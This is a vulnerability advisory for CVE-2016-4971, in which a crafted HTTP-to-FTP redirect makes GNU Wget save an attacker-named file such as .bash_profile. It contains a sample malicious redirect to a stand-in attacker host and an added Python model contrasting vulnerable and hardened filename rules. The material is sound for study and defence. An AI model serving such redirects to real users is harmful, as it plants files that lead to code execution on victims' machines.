CVE-2016-4971

Severity score: 8.8
First published: Tue Jun 07 2016

GNU Wget (including the latest version at the time of the report), when supplied with a malicious website link, can be tricked into saving an arbitrary remote file supplied by an attacker, with arbitrary contents and filename, under the current directory. This can lead to potential code execution by creating system scripts (such as .bash_profile and others) within the home directory, as well as other unauthorized actions (such as request sniffing by proxy modification, or arbitrary system file retrieval) by uploading a .wgetrc configuration file.

Because of the lack of sufficient controls in wget, when a user downloads a file with wget, such as:

    wget http://attackers-server/safe_file.txt

an attacker who controls the server could make wget create an arbitrary file with arbitrary contents and filename by issuing a crafted HTTP 30X redirect containing an FTP server reference in response to the victim's wget request. For example, if the attacker's server replies with the following response:

    HTTP/1.1 302 Found
    Cache-Control: private
    Content-Type: text/html; charset=UTF-8
    Location: ftp://attackers-server/.bash_profile
    Content-Length: 262
    Server: Apache

wget will automatically follow the redirect and download a malicious .bash_profile file from the malicious FTP server. It will fail to rename the file to the originally requested filename 'safe_file.txt', as it would normally do in the case of a redirect to another HTTP resource with a different name. Because of this vulnerability, an attacker is able to upload an arbitrary file with an arbitrary filename to the victim's current directory.
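The following is an added example, not code from the advisory or from the wget project. It models, in Python, how a download client picks the local filename after a redirect: the vulnerable branch reproduces the behaviour the advisory describes (an HTTP-to-FTP redirect is saved under the name the server chose), and the hardened branch derives the name from the URL the user actually requested and refuses hidden or path-escaping names. The HTTP response and URLs are the constructed sample from the advisory text; the function names are this example's own.

```python
"""Model of local-filename selection after an HTTP redirect.

Added example, not wget's implementation: shows the flaw described in
CVE-2016-4971 beside a hardened naming rule.
"""
import posixpath
from typing import Optional, Tuple
from urllib.parse import urlsplit

# Constructed sample exchange taken from the advisory text.
REQUESTED_URL = "http://attackers-server/safe_file.txt"
REDIRECT_RESPONSE = (
    "HTTP/1.1 302 Found\r\n"
    "Cache-Control: private\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "Location: ftp://attackers-server/.bash_profile\r\n"
    "Content-Length: 262\r\n"
    "Server: Apache\r\n"
    "\r\n"
)


def parse_redirect(raw: str) -> Tuple[int, Optional[str]]:
    """Return (status code, Location header) from a raw HTTP response head."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    status = int(lines[0].split()[1])
    location = None
    for line in lines[1:]:
        name, _, value = line.partition(":")
        if name.strip().lower() == "location":
            location = value.strip()
    return status, location


def basename_of(url: str) -> str:
    """Last path component of a URL, falling back to index.html for '/'."""
    return posixpath.basename(urlsplit(url).path) or "index.html"


def is_safe_filename(name: str) -> bool:
    """Reject names that are hidden (dotfiles such as .bash_profile or
    .wgetrc) or that could leave the current directory."""
    if name in ("", ".", ".."):
        return False
    if name.startswith("."):
        return False
    if "/" in name or "\\" in name or "\x00" in name:
        return False
    return True


def vulnerable_local_name(requested: str, location: str) -> str:
    """Behaviour the advisory describes for wget < 1.18: an HTTP-to-HTTP
    redirect keeps the originally requested name, but an HTTP-to-FTP
    redirect is saved under the name from the server-supplied FTP URL."""
    if urlsplit(location).scheme == "ftp":
        return basename_of(location)
    return basename_of(requested)


def hardened_local_name(requested: str, location: str) -> str:
    """Hardened rule: the local name always comes from the URL the user
    typed, never from the redirect target, and unsafe names are refused."""
    del location  # the redirect target must not influence the local name
    name = basename_of(requested)
    if not is_safe_filename(name):
        raise ValueError("refusing unsafe local filename %r" % name)
    return name


if __name__ == "__main__":
    status, location = parse_redirect(REDIRECT_RESPONSE)
    print("redirect:", status, "->", location)
    print("vulnerable saves as:", vulnerable_local_name(REQUESTED_URL, location))
    print("hardened saves as:  ", hardened_local_name(REQUESTED_URL, location))
```

Running the module prints `.bash_profile` for the vulnerable rule and `safe_file.txt` for the hardened one; with the same redirect pointing at an HTTP resource, both rules agree on `safe_file.txt`, which is the asymmetry the advisory points out. For a real wget, upgrading to 1.18 or later (which switched to naming the file from the original URL on redirect) or pinning the output name explicitly with `-O` removes the dependence on the server-chosen name.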

Credit: secalert@redhat.com

Affected Software          Affected Version
GNU Wget                   < 1.18
Canonical Ubuntu Linux     = 12.04
Canonical Ubuntu Linux     = 14.04
Canonical Ubuntu Linux     = 15.10
Canonical Ubuntu Linux     = 16.04
Oracle Solaris             = 10
Oracle Solaris             = 11.3
Paloaltonetworks Pan-os    >= 6.1.0, <= 6.1.16
Paloaltonetworks Pan-os    >= 7.0.0, <= 7.0.14
Paloaltonetworks Pan-os    >= 7.1.0, <= 7.1.9
